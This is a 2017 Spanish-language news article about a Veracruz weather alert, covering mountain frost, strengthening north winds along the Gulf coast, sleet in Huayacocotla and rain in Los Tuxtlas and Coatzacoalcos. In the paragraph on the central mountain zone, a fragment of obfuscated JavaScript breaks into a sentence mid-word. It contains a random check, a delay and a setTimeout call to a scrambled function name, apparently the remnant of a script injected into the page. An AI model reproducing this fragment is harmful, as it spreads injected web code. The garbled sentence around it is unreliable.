Alertan por heladas, aumento de viento del norte y bajas temperaturas en Veracruz

8 diciembre, 2017

Yhadira Paredes. Xalapa. Durante este fin de semana se esperan heladas importantes en regiones serranas durante la noche y madrugada, informaron los integrantes del Comité Estatal de Meteorología, quienes dejaron en claro que la caída de nieve es poco probable en zonas como el Pico de Orizaba y el Cofre de Perote.

En la conferencia de prensa de cada viernes, el subcoordinador de Pronóstico Estacional de la Secretaria de Protección Civil, Federico Acevedo Rosas, indicó que sí se prevé la caída de aguanieve en la región de Huayacocotla.

Lo anterior a pesar de que el frente frío 14 dejo nevadas en Monclova, Saltillo, Monterrey, Chihuahua y Ciudad Juárez, siendo localidades que tenían años de no experimentar dicho fenómeno.

Acevedo Rosas indicó que no descartan cencelladas tanto en el Pico de Orizaba como en la zona del Cofre.

Asimismo indicó que este viernes se incrementará la intensidad del viento del norte en localidades del litoral del Golfo: desde Laguna Verde e Isla de Sacrificios al puerto de Coatzacoalcos.

En la zona montañosa central se registraran temperaturas más bajas, sumadas a heladas; aun cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando la previsión anticipa de largos periodos de sol y cielos despejados.

Finalmente dijo qué hay pronóstico de lluvias en las zonas de Los Tuxtlas y Coatzacoalcos en la zona sur del estado.